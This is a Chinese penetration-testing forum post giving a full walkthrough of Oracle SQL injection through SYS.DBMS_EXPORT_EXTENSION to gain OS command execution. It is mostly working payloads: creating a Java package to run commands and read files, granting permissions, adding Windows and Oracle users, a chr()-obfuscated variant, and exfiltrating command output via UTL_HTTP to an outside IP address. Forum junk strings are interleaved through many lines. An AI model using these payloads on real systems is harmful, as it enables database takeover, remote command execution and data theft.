找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2200|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
% M) j1 ?* k1 O/ E# N& R
; D6 ?9 l9 [/ {" N6 O  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
+ W4 S4 A% Z% y! q的形式即可。(用" 'a'|| "是为了让语句返回true值)
7 |) P7 z  F2 c7 `! `2 \# N' F语句有点长,可能要用post提交。
0 n0 S+ O- X) Q+ W以下是各个步骤:
! o0 `/ Y9 w& _5 r1.创建包 6 ~5 d1 q3 s9 {  e$ }
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
0 G9 y$ z" u$ M# L& a/xxx.jsp?id=1 and '1'<>'a'||(
& y* Y9 v# [) n: X3 k$ R4 s$ [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" z0 u3 M( ]$ Jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" K+ D& \1 e0 w2 l- T* W9 dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
2 w; N. W# K( [+ N9 w; x}'''';END;'';END;--','SYS',0,'1',0) from dual - W6 _+ e, G) H6 _" C6 i/ n) O% A
)
9 Z0 |; W( v% \7 s------------------------ ; M' K; n  o/ P! O& V' S, T
如果url有长度限制,可以把readFile()函数块去掉,即:
$ A* [' E$ n* z$ p; D; a/ z% _/xxx.jsp?id=1 and '1'<>'a'||( ; Z3 D) m# I7 J& F/ a
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 g9 E' `' ~- c+ `( h6 X' Y! ]+ o5 X3 _
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" U; O" r/ x; V' c: a! h; Knew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
- {9 O# B% q- r, m0 B6 Z}'''';END;'';END;--','SYS',0,'1',0) from dual   k" L' Y' z  Q# M% k
)
& V- f5 A* G5 @8 t5 E/ l: C同时把后面步骤 提到的 对readFile()的处理语句去掉。
9 B2 a9 g/ ]  \; U8 I. S8 s------------------------------ * ?8 x" E" U, F$ A" f
2.赋Java权限 1 ?( f. ]5 `" e0 t$ q; N8 e9 ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
9 z" B9 `/ [4 O: A) c3 J3.创建函数 8 B7 S, S: i1 }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% n2 J; {5 N$ M9 m2 g8 c4 U
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
; D( Y+ s' W/ gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 C  ]4 I, U, A7 t8 J+ {create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
7 O- O/ p5 ?4 ^7 k! L! Q" o- f/ \4.赋public执行函数的权限 2 |* ?% F% Q2 w2 Z' v0 J8 `
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual# M; w' h' Z7 f- m% B0 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
0 l- \, K$ C: s0 I+ [5.测试上面的几步是否成功 ! c. N' x' Y8 t6 \0 h
and '1'<>'11'||( ) l! F5 Z: Q& C& x/ ?. M
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 2 F) l& q0 Z6 g' ^' P' B6 P! t
)
/ ?7 \/ R0 W. ]! W- W: m2 \: Tand '1'<>( ' Z' y5 i! f- X. o& A; }- I# j
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
$ U$ d8 u7 `+ d4 S) & N; f/ Z1 }" l' V
6.执行命令: & ~! S! L) `3 f
/xxx.jsp?id=1 and '1'<>( 2 z+ q$ m5 k0 d
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual ( P/ d( @0 q& r+ t# S6 y3 h" p
5 Y$ x, W; y* w; D  E
)   F# h3 a" n" M* O, k: W+ C" P
/xxx.jsp?id=1 and '1'<>(
3 B0 C1 e+ d5 \$ u7 s- i! q+ cselect  sys.LinxReadFile('c:/boot.ini') from dual
- ]) [" q. q* m) }4 b
1 y8 }2 X0 u5 Y: y- Z& `2 G" r* m)
2 L" w! B& ~2 q: B1 T  
# C% ~* x; `# z& ^: p; o注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ( m. }7 E$ x& L* V
如果要查看运行结果可以用 union :
5 e& K$ s0 E) m3 A  v: n" g/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
* ?3 w9 q8 b: @: {4 Y或者UTL_HTTP.request(:
" p& u; r' y: r6 S; ^; N/xxx.jsp?id=1 and '1'<>(
" A( A4 @2 @. t9 m: KSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual6 _, U% _4 [( {& }$ w! z2 s
) 2 C$ z# i* G2 F( o9 `
/xxx.jsp?id=1 and '1'<>(
8 L1 n  S1 q0 \7 s$ X9 dSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
* b5 Z% a4 j! l5 Y4 H)
, J$ o2 K2 ~$ j+ r1 O7 P. h注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。6 w0 w& s, ^" ?+ f* R
-------------------- 4 k+ F& P4 g' v2 C9 t* u
6.内部变化 9 u' Z: |! [- L. }2 W
通过以下命令可以查看all_objects表达改变: 4 y* ], N1 y% \& q. D
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'% F/ u( J0 r+ l/ I0 r# n
7.删除我们创建的函数 ) r, H5 O7 l( T  r, f6 N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 D5 }. c/ V0 F; [1 b: {drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
. C, E" {  x$ r  ?==================================================== & d) r3 [+ R. C6 Y0 p; N9 ^
全文结束。谨以此文赠与我的朋友。
9 i- V. X- E8 c/ T- elinx
0 i# v5 q) H0 q& f, l8 G) f124829445 # L$ W3 A% u' ~2 ^2 _( q: c
2008.1.12 + b$ y" B6 a- B
linyujian@bjfu.edu.cn : x/ f2 Q. T6 {; }% o" n& A
======================================================================
: L$ I/ m! Y$ v5 Y1 U测试漏洞的另一方法:
5 R  u7 |; B) {创建oracle帐号:
9 Y  w) n, u7 H6 S' y* bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* u% w& b. t* E5 r6 Q
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
: _; T( K* C9 m3 ^即:
* k; N8 o( q# |' M1 {! [& w- o  Kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
1 b  S! g& `3 Q/ schr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
6 x9 l( D  z) }5 h* {, [确定漏洞存在: ! P) Z1 P3 _5 F: r1 L0 x4 f. R
1<>( - z: e4 C! A) u0 X6 [0 P
select user_id from all_users where username='LINXSQL'
) @6 q6 K; A7 T: s. e" E) 7 |$ ^$ ]( k+ j8 @6 b9 g) H
给linxsql连接权限:
/ z' c  y! e& e* Q# Cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& ~; D& _4 i4 O+ w: M5 q1 sGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
( ~8 m& q6 `- Y  ^7 f% K删除帐号: - Q2 G5 {) U6 X0 ^  X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 Q3 J: s: ?5 t+ c4 i3 e* |drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
8 [$ M5 U+ g- _9 [======================
2 ]" \, }0 C3 n+ v& W以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. ~$ }, ^4 h/ I* R7 m. T/ @4 U/ W
1.jsp?id=1 and '1'<>(
- L. ?: v) t9 S( O/ Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''  X7 R% K2 V% z( Y5 W+ M& {$ D
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual6 Q" M( L" |/ T: X) y" m( Y+ d
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
( D$ y. Z7 |" X$ g, b; [0 A/ L )- \1 M  c. F9 r, X% S

6 v6 u$ M; Q# g( K4 {3 ?8 A1 A6 M
# {$ Y0 p4 e, _% P" g% s* j
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表